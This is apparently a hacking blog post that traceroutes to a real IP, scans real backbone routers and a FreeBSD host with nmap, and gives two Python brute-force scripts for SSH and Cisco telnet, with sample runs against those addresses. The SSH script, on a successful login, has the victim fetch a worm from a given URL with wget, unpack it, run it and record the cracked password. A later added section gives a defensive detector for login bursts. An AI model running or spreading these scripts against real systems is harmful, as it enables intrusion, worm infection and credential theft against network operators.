Testing Weak Passwords on some BGP - (Part 1)
Hello, back again with me evilut10n a.k.a. ev1lut10n. Today we're going to play around by examining some hops. As an example, take the foreign IP address 72.9.242.206; let's do a traceroute:
from #1 box:
===========
sh-3.1# traceroute 72.9.242.206
traceroute to 72.9.242.206 (72.9.242.206), 30 hops max, 40 byte packets
1 203.142.71.145 (203.142.71.145) 2.070 ms 5.719 ms 2.274 ms
2 202.169.32.161 (202.169.32.161) 2.252 ms 0.943 ms 2.296 ms
3 203.142.67.57 (203.142.67.57) 170.668 ms 168.425 ms 166.117 ms
4 112.78.190.146 (112.78.190.146) 0.583 ms 2.458 ms 4.434 ms
5 id-jkt-mid-igw-3.biznetnetworks.com (202.169.34.90) 2.098 ms 0.591 ms 84.295 ms
6 202.169.34.182 (202.169.34.182) 149.619 ms 205.955 ms 202.077 ms
7 203.208.174.65 (203.208.174.65) 198.081 ms 199.698 ms 195.697 ms
8 POS3-6.sngtp-ar1.ix.singtel.com (203.208.172.9) 187.701 ms 183.827 ms 179.829 ms
9 so-3-0-0-0.laxow-cr1.ix.singtel.com (203.208.151.222) 354.366 ms 349.425 ms 345.548 ms
10 ge-4-0-0-0.laxow-dr2.ix.singtel.com (203.208.149.34) 341.549 ms 339.295 ms so-2-0-3-0.plapx-cr2.ix.singtel.com (203.208.149.246) 333.672 ms
11 203.208.186.82 (203.208.186.82) 331.298 ms 327.420 ms 323.547 ms
12 ae1-50g.cr1.lax1.us.nlayer.net (69.31.127.129) 319.421 ms 315.546 ms 313.295 ms
13 xe-1-0-0.cr1.iah1.us.nlayer.net (69.22.142.121) 459.824 ms 455.949 ms 452.201 ms
14 xe-4-2-1.cr1.atl1.us.nlayer.net (69.22.142.118) 451.572 ms 447.695 ms 443.697 ms
15 ae1-40g.ar1.atl1.us.nlayer.net (69.31.135.130) 411.970 ms 407.026 ms 405.027 ms
16 as3595.xe-2-0-5-103.ar1.atl1.us.nlayer.net (69.31.135.54) 400.905 ms 397.029 ms 393.152 ms
17 63.247.64.158 (63.247.64.158) 450.615 ms 446.617 ms 442.738 ms
18 72.9.251.141 (72.9.251.141) 438.742 ms 434.863 ms 430.865 ms
19 72.9.242.206 (72.9.242.206) 428.614 ms 424.737 ms 420.862 ms
sh-3.1#
==============
from #2 box:
================
$ traceroute 72.9.242.206
traceroute to 72.9.242.206 (72.9.242.206), 30 hops max, 60 byte packets
1 10.18.0.1 (10.18.0.1) 61.230 ms 61.283 ms 61.293 ms
2 fm-ip-202.73.96.73.fast.net.id (202.73.96.73) 63.075 ms 63.092 ms 63.108 ms
3 fm-ip-202.73.96.73.fast.net.id (202.73.96.73) 63.122 ms 63.139 ms 63.153 ms
4 fm-ip-202.73.96.70.fast.net.id (202.73.96.70) 62.781 ms 62.838 ms 62.858 ms
5 IP-125-33.MCS.napinfo.net (119.110.125.33) 167.950 ms 168.004 ms 168.019 ms
6 IP-112-230.MCS.napinfo.net (119.110.112.230) 144.061 ms 22.813 ms 22.859 ms
7 snge-b2-link.telia.net (213.248.86.73) 23.548 ms 23.665 ms 23.607 ms
8 hnk-b2-link.telia.net (80.91.245.149) 57.286 ms hnk-b2-link.telia.net (80.91.245.151) 55.632 ms hnk-b2-link.telia.net (80.91.245.149) 57.332 ms
9 las-bb1-link.telia.net (213.155.130.36) 222.901 ms 222.782 ms 222.963 ms
10 dls-bb1-link.telia.net (213.248.80.14) 262.366 ms 255.400 ms 260.453 ms
11 atl-bb1-link.telia.net (80.91.246.74) 271.448 ms atl-bb1-link.telia.net (80.91.246.73) 277.744 ms atl-bb1-link.telia.net (80.91.246.74) 271.948 ms
12 globalnet-ic-129966-atl-bb1.c.telia.net (213.248.93.110) 279.818 ms 278.362 ms 278.440 ms
13 63.247.64.158 (63.247.64.158) 282.985 ms 283.061 ms 283.042 ms
14 72.9.251.141 (72.9.251.141) 272.594 ms 267.265 ms 266.719 ms
15 72.9.242.206 (72.9.242.206) 267.505 ms 268.574 ms 265.572 ms
================
from #3 box:
=================
sh-3.2# traceroute 72.9.242.206
traceroute to 72.9.242.206 (72.9.242.206), 30 hops max, 40 byte packets
1 gw-216-6.serverspeed.serverspeedy.com (49.0.6.217) 0.196 ms 0.251 ms 0.237 ms
2 49.156.23.229 (49.156.23.229) 0.860 ms 0.852 ms *
3 * * 253.subnet175-103-50.maxindo.net.id (175.103.50.253) 0.887 ms
4 203.81.188.221 (203.81.188.221) 1.726 ms 1.701 ms 1.688 ms
5 203.81.188.217 (203.81.188.217) 1.675 ms 1.664 ms *
6 * * *
7 if-4-0-1-575.core1.SVQ-Singapore.as6453.net (216.6.91.29) 200.885 ms 200.973 ms 201.047 ms
8 if-5-3233.tcore1.PDI-PaloAlto.as6453.net (66.198.127.29) 201.666 ms * *
9 * * *
10 * Vlan3254.icore1.SQN-SanJose.as6453.net (66.198.144.6) 201.278 ms *
11 sjo-bb1-link.telia.net (213.248.95.129) 191.178 ms 191.904 ms 191.551 ms
12 * ash-bb1-link.telia.net (213.155.130.212) 266.430 ms 264.877 ms
13 atl-bb1-link.telia.net (80.91.252.214) 278.309 ms 278.563 ms 279.392 ms
14 globalnet-ic-129966-atl-bb1.c.telia.net (213.248.93.110) 258.743 ms 258.231 ms 258.034 ms
15 63.247.64.146 (63.247.64.146) 257.607 ms 258.787 ms 258.333 ms
16 72.9.251.141 (72.9.251.141) 258.018 ms 257.988 ms 258.124 ms
17 72.9.242.206 (72.9.242.206) 260.072 ms 262.395 ms 266.793 ms
sh-3.2#
==================
from #4 box:
===========
1 85.153.18.217 (85.153.18.217) 0.553 ms 0.502 ms 0.509 ms
2 85.153.6.66 (85.153.6.66) 0.457 ms 0.448 ms 0.443 ms
3 85.153.1.1 (85.153.1.1) 0.500 ms 0.283 ms 0.253 ms
4 195.175.51.169 (195.175.51.169) 0.870 ms 1.000 ms 2.659 ms
5 * 81.212.212.101 (81.212.212.101) 1.005 ms 0.683 ms
6 static.turktelekom.com.tr (212.156.103.33) 56.032 ms 55.871 ms 55.934 ms
7 ldn-b5-link.telia.net (213.248.104.41) 67.999 ms 68.186 ms 67.996 ms
8 ldn-bb2-link.telia.net (80.91.250.169) 67.882 ms ldn-bb1-link.telia.net (80.91.247.91) 68.177 ms ldn-bb1-link.telia.net (80.91.249.179) 68.291 ms
9 ash-bb1-link.telia.net (213.248.65.210) 152.221 ms 151.703 ms 171.694 ms
10 atl-bb1-link.telia.net (80.91.252.214) 159.651 ms atl-bb1-link.telia.net (80.91.247.173) 161.079 ms atl-bb1-link.telia.net (80.91.248.137) 167.140 ms
11 globalnet-127291-atl-bb1.c.telia.net (213.248.90.54) 150.307 ms 148.945 ms 150.492 ms
12 63.247.64.150 (63.247.64.150) 148.940 ms 149.189 ms 148.730 ms
13 72.9.251.141 (72.9.251.141) 150.687 ms 150.648 ms 150.887 ms
14 72.9.242.206 (72.9.242.206) 152.043 ms 149.936 ms 152.036 ms
==============
OK, from the above results, let's examine some of the hops they share:
63.247.64.146
63.247.64.158
63.247.64.150
72.9.251.141
OK, let's grab some info from these BGP routers:
====================
# nmap -A 63.247.64.146 -PN
Starting Nmap 5.21 ( http://nmap.org ) at 2011-06-17 08:13 WIT
Nmap scan report for 63.247.64.146
Host is up (0.27s latency).
Not shown: 961 closed ports, 38 filtered ports
PORT STATE SERVICE VERSION
23/tcp open telnet Cisco router
Device type: switch|router|broadband router|WAP|specialized|VoIP adapter
Running (JUST GUESSING) : Cisco IOS 12.X|11.X (98%), Cisco embedded (93%), Cisco CatOS (93%)
Aggressive OS guesses: Cisco Catalyst 6500-series switch (IOS 12.1) (98%), Cisco Catalyst 2950 switch (IOS 12.1) (97%), Cisco 2900-series, 3650, or 3750 switch; 6509 or 7206VXR router; or uBR925 or uBR7111 cable modem (IOS 12.1 - 12.2) (97%), Cisco Aironet 350 or 1200 WAP (96%), Cisco Catalyst 2960 switch (IOS 12.2) (96%), Cisco Catalyst 2960, 3550, or 3560 switch (IOS 12.2) (96%), Cisco Catalyst 2960, 3560, or 6500 switch (IOS 12.2) (95%), Cisco 2950, 2960, 3550, or 3560 switch (IOS 12.1 - 12.2) (95%), Cisco DOCSIS cable modem termination server (IOS 12.1) (94%), Cisco 806, 1712, 1721, or 2600 router (IOS 12.2 - 12.3) (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 14 hops
Service Info: OS: IOS; Device: router
========================
# nmap -A -PN 63.247.64.158
Starting Nmap 5.21 ( http://nmap.org ) at 2011-06-17 08:18 WIT
Nmap scan report for 63.247.64.158
Host is up (0.27s latency).
Not shown: 961 closed ports, 38 filtered ports
PORT STATE SERVICE VERSION
23/tcp open telnet Cisco router
Device type: switch
Running: Cisco IOS 12.X
OS details: Cisco Catalyst 2960, 3560, or 6500 switch (IOS 12.2), Cisco Catalyst 6500-series switch (IOS 12.1)
Network Distance: 13 hops
Service Info: OS: IOS; Device: router
===================
# nmap -A -PN 63.247.64.150
Starting Nmap 5.21 ( http://nmap.org ) at 2011-06-17 08:18 WIT
Nmap scan report for 63.247.64.150
Host is up (0.27s latency).
Not shown: 961 closed ports, 38 filtered ports
PORT STATE SERVICE VERSION
23/tcp open telnet Cisco router
Device type: switch|router|broadband router|WAP|specialized|VoIP adapter
Running (JUST GUESSING) : Cisco IOS 12.X|11.X (98%), Cisco embedded (93%), Cisco CatOS (92%)
Aggressive OS guesses: Cisco Catalyst 6500-series switch (IOS 12.1) (98%), Cisco 2900-series, 3650, or 3750 switch; 6509 or 7206VXR router; or uBR925 or uBR7111 cable modem (IOS 12.1 - 12.2) (97%), Cisco Catalyst 2950 switch (IOS 12.1) (97%), Cisco Catalyst 2960 switch (IOS 12.2) (96%), Cisco Aironet 350 or 1200 WAP (95%), Cisco Catalyst 2960, 3550, or 3560 switch (IOS 12.2) (95%), Cisco Catalyst 2960, 3560, or 6500 switch (IOS 12.2) (95%), Cisco 806, 1712, 1721, or 2600 router (IOS 12.2 - 12.3) (94%), Cisco Aironet 1200 WAP (IOS 12.3) (94%), Cisco 2950, 2960, 3550, or 3560 switch (IOS 12.1 - 12.2) (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 13 hops
Service Info: OS: IOS; Device: router
===================
# nmap -A 72.9.251.141 -PN
Starting Nmap 5.21 ( http://nmap.org ) at 2011-06-17 08:11 WIT
Nmap scan report for 72.9.251.141
Host is up (0.27s latency).
Not shown: 957 closed ports, 41 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.5p1 (FreeBSD 20061110; protocol 2.0)
|_ssh-hostkey: 1024 20:38:e5:3b:f9:93:d0:15:ab:bc:61:01:30:6e:89:f6 (DSA)
199/tcp open smux Linux SNMP multiplexer
Device type: general purpose
Running: FreeBSD 6.X
OS details: FreeBSD 6.2-STABLE - 6.4-STABLE
Network Distance: 14 hops
Service Info: OSs: FreeBSD, Linux
=======================
* Brute forcing SSHD
OK, let's start with the one that has sshd. I use this simple Python script for brute forcing:
========
#!/usr/bin/python
#made by: ev1lut10n
import paramiko
import pexpect
import sys
import time
import os
import random
db = "log"
opla = ['/var/tmp/', '/tmp/']
acak=random.randint(0, 1)
path=opla[acak]
user=sys.argv[1]
serv=sys.argv[2]
daftar=sys.argv[3]
port=sys.argv[4]
url_worm=sys.argv[5]
fd = open(daftar)
content = fd.readline()
perintah1="cd "+path+";lwp-download "+url_worm
perintah2="cd "+path+";wget "+url_worm
perintah3="echo 'cd "+path+";tar zxvf .data.tgz;cd "+path+"/.backups/;perl
backup.pl'>"+path+"run.sh"
perintah4="cd "+path+";chmod +x run.sh;"
perintah5="sh "+path+"run.sh;cd "+path+";./run.sh"
def logindaninfek():
global s
global x
global serv
global content
global perintah1
global perintah2
global perintah3
global perintah4
global perintah5
global perintah6
global ekstrak
global infek
global user
print "\nstart login and infect\n"
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(serv, username=user,password=content)
print "\nexecuting "+perintah1
time.sleep(2)
stdin, stdout, stderr = ssh.exec_command(perintah1)
print "\nexecuting "+perintah2
time.sleep(2)
stdin, stdout, stderr = ssh.exec_command(perintah2)
print "\nexecuting "+perintah3
time.sleep(2)
stdin, stdout, stderr = ssh.exec_command(perintah3)
print "\nexecuting "+perintah4
time.sleep(2)
stdin, stdout, stderr = ssh.exec_command(perintah4)
print "\nexecuting "+perintah5
time.sleep(2)
stdin, stdout, stderr = ssh.exec_command(perintah5)
content=content.strip()
perintah6="echo '"+user+":"+content+"'>"+path+".backups/userpass"
print "\necho '"+user+":"+content+"'>"+path+".backups/userpass"
os.system(perintah6)
time.sleep(2)
stdin, stdout, stderr = ssh.exec_command(perintah6)
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError, e:
print >>sys.stderr, "fork #1 failed: %d (%s)" % (e.errno,
e.strerror)
sys.exit(1)
foo = pexpect.spawn('ssh '+user+'@'+serv+' -p '+port)
foo.expect('yes/no', timeout=190)
foo.sendline('yes')
foo.expect('assword:',timeout=190)
foo.sendline('root')
i = foo.expect (['assword:', 'Terminal type', '[#\$] '],timeout=190)
if i==0:
print '\nlogin failure at '+serv+' using password:root'
foo.kill(0)
elif i==2:
file = open(db, "a")
print '\nLogin OK... at '+serv+' using password:root'
logindaninfek()
file.write("\n"+serv+":root")
sys.exit(1)
elif i==3:
file = open(db, "a")
print '\nLogin OK... at '+serv+' using password:root'
logindaninfek()
file.write("\n"+serv+":root")
sys.exit(1)
while (content != "" ):
content.replace( "\n", "" )
content = fd.readline()
content=content.strip()
foo = pexpect.spawn('ssh '+user+'@'+serv+' -p '+port)
foo.expect('.*',timeout=190)
foo.sendline(content)
i = foo.expect (['assword:', 'Terminal type', '[#\$] '],timeout=190)
if i==0:
print '\nlogin failure at '+serv+' using password:'+content
foo.kill(0)
elif i==2:
print 'Shell command prompt at '+serv+':'+content
logindaninfek()
os.system('perl report.pl '+serv+'|'+content)
file = open(db, "a")
file.write("\n"+serv+":"+content)
sys.exit(1)
elif i==3:
print 'Login OK.'
print 'Shell command prompt at '+serv+':'+content
logindaninfek()
os.system('perl report.pl '+serv+'|'+content)
file = open(db, "a")
file.write("\n"+serv+":"+content)
sys.exit(1)
=====================================
Before running that script you need the paramiko and pexpect Python modules. Save the above script as ssh.py.
Testing for brute force is simple; here is an example of using the above script:
========================
$ python ssh.py root 72.9.251.141 password.txt 22 http://devilzc0de.org
$
login failure at 72.9.251.141 using password:root
login failure at 72.9.251.141 using password:123456
login failure at 72.9.251.141 using password:12345
login failure at 72.9.251.141 using password:1234567
login failure at 72.9.251.141 using password:12345678
login failure at 72.9.251.141 using password:123456789
login failure at 72.9.251.141 using password:Password
login failure at 72.9.251.141 using password:iloveyou
login failure at 72.9.251.141 using password:admin
login failure at 72.9.251.141 using password:administrator
login failure at 72.9.251.141 using password:toor
login failure at 72.9.251.141 using password:admin123
login failure at 72.9.251.141 using password:123admin
login failure at 72.9.251.141 using password:princess
login failure at 72.9.251.141 using password:rockyou
login failure at 72.9.251.141 using password:abc123
login failure at 72.9.251.141 using password:Nicole
login failure at 72.9.251.141 using password:Daniel
========and so on===========
====================
password.txt is your dictionary file, 22 is the SSH port number, and root is the username to try for brute forcing.
* Brute forcing telnet
===================
Next, on 63.247.64.146 we see it's a Cisco router with port 23 open. Let's see how it works; in case you want to brute force it, you may use this simple brute forcer for a BGP router's telnet with one variable only (password only):
==================
#!/usr/bin/python
#made by: ev1lut10n
#BGP's telnet brute force for 1 variable (password) input only
import pexpect
import sys
import time
import os
import random
#your password list goes here
daftar="password.txt"
#your target ip goes here
serv="63.247.64.146"
fd = open(daftar)
content = fd.readline()
while (content != "" ):
content.replace( "\n", "" )
content = fd.readline()
content=content.strip()
print "testing password:"+content
foo = pexpect.spawn('telnet '+serv)
i=foo.expect('assword:',timeout=190)
foo.sendline(content)
i2=foo.expect('assword:',timeout=190)
if i2==0:
foo.kill(0)
print "login failure using password: "+content
elif i2==2:
foo.kill(0)
print "[+] logged in using password:"+content
sys.exit(1)
elif i2==2:
foo.kill(0)
print "[+] logged in using password:"+content
sys.exit(1)
os.system("killall telnet")
================
sample usage:
===============
$ python telnet.py
testing password:123456
login failure using password: 123456
testing password:12345
login failure using password: 12345
testing password:1234567
login failure using password: 1234567
testing password:12345678
login failure using password: 12345678
testing password:123456789
login failure using password: 123456789
testing password:Password
========and so on=============
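From the defender's side, both the SSH guessing above and the telnet guessing against the router show up as a burst of failed logins from one source, sometimes followed by a success. The following is an added example, not part of the original post: it flags such bursts in sshd auth.log lines and in Cisco IOS %SEC_LOGIN-4-LOGIN_FAILED syslog messages, and notes when a flagged source later logs in. The log lines, hostnames and source addresses are constructed, and the exact layout of the IOS message is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed sample (not from the page): an sshd failure burst from one source ending in a
# success, one unrelated failure, and an IOS %SEC_LOGIN-4-LOGIN_FAILED line (assumed shape).
SAMPLE_LOG = """\
Jun 17 08:11:01 bb1 sshd[4312]: Failed password for root from 198.51.100.7 port 51822 ssh2
Jun 17 08:11:03 bb1 sshd[4314]: Failed password for root from 198.51.100.7 port 51824 ssh2
Jun 17 08:11:05 bb1 sshd[4316]: Failed password for root from 198.51.100.7 port 51826 ssh2
Jun 17 08:11:07 bb1 sshd[4318]: Failed password for root from 198.51.100.7 port 51828 ssh2
Jun 17 08:11:11 bb1 sshd[4322]: Accepted password for root from 198.51.100.7 port 51832 ssh2
Jun 17 08:20:00 bb1 sshd[4400]: Failed password for admin from 203.0.113.9 port 40000 ssh2
Jun 17 08:13:02 rtr1 1234: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: ] [Source: 198.51.100.7] [localport: 23] [Reason: Login Authentication Failed] at 08:13:02 WIT Fri Jun 17 2011
"""
SYSLOG_RE = re.compile(r"^(\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ (.*)$")
SSHD_RE = re.compile(r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?\S+ from (\S+) port")
IOS_RE = re.compile(r"%SEC_LOGIN-4-LOGIN_FAILED: .*\[Source: ([^\]]+)\] \[localport: (\d+)\]")
def parse_line(line, year=2011):
    """Return (timestamp, source_ip, service, success) for a recognised line, else None."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime("%d %s" % (year, m.group(1)), "%Y %b %d %H:%M:%S")
    s = SSHD_RE.search(m.group(2))
    if s:
        return ts, s.group(2), "ssh", s.group(1) == "Accepted"
    c = IOS_RE.search(m.group(2))
    if c:
        return ts, c.group(1), "telnet" if c.group(2) == "23" else "port" + c.group(2), False
    return None

def detect_bruteforce(log_text, threshold=4, window_seconds=60):
    """Flag sources with >= threshold failures inside window_seconds; note a later success."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            by_src[ev[1]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        evs.sort()  # tuples compare by timestamp first
        fails = [e[0] for e in evs if not e[3]]
        # end times of every run of `threshold` failures that fits inside the window
        bursts = [fails[i + threshold - 1] for i in range(len(fails) - threshold + 1)
                  if (fails[i + threshold - 1] - fails[i]).total_seconds() <= window_seconds]
        if not bursts:
            continue
        findings[src] = {"failures": len(fails), "services": sorted({e[2] for e in evs}),
                         "success_after_burst": any(e[3] and e[0] >= bursts[0] for e in evs)}
    return findings
```

A source reported with success_after_burst set is the case worth paging on: a guessed password has worked and the host needs credential rotation and review, not just a block rule.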
OK, I'm going to continue next time. See you.